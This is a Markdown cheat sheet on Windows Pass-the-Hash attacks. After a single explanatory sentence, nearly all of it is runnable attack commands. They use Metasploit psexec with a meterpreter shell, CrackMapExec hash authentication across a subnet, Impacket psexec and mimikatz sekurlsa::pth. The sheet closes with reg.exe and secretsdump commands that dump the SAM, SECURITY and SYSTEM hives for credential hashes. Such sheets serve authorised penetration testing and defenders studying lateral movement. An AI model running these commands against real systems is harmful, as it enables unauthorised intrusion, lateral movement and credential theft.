38 lines
1.5 KiB
Markdown
38 lines
1.5 KiB
Markdown
|
# Hash - Pass-the-Hash
|
|||
|
|
|
|||
|
|
The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500.
|
|||
|
|
|
|||
|
|
* Metasploit
|
|||
|
|
```powershell
|
|||
|
|
use exploit/windows/smb/psexec
|
|||
|
|
set RHOST 10.2.0.3
|
|||
|
|
set SMBUser jarrieta
|
|||
|
|
set SMBPass nastyCutt3r
|
|||
|
|
# NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
|
|||
|
|
# NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
|
|||
|
|
set PAYLOAD windows/meterpreter/bind_tcp
|
|||
|
|
run
|
|||
|
|
shell
|
|||
|
|
```
|
|||
|
|
* CrackMapExec
|
|||
|
|
```powershell
|
|||
|
|
cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
|
|||
|
|
```
|
|||
|
|
* Impacket suite
|
|||
|
|
```powershell
|
|||
|
|
proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
|
|||
|
|
```
|
|||
|
|
* Windows RDP and mimikatz
|
|||
|
|
```powershell
|
|||
|
|
sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863
|
|||
|
|
sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the users ntlm hash> /run:"mstsc.exe /restrictedadmin"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
You can extract the local **SAM database** to find the local administrator hash :
|
|||
|
|
|
|||
|
|
```powershell
|
|||
|
|
C:\> reg.exe save hklm\sam c:\temp\sam.save
|
|||
|
|
C:\> reg.exe save hklm\security c:\temp\security.save
|
|||
|
|
C:\> reg.exe save hklm\system c:\temp\system.save
|
|||
|
|
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
|
|||
|
|
```
|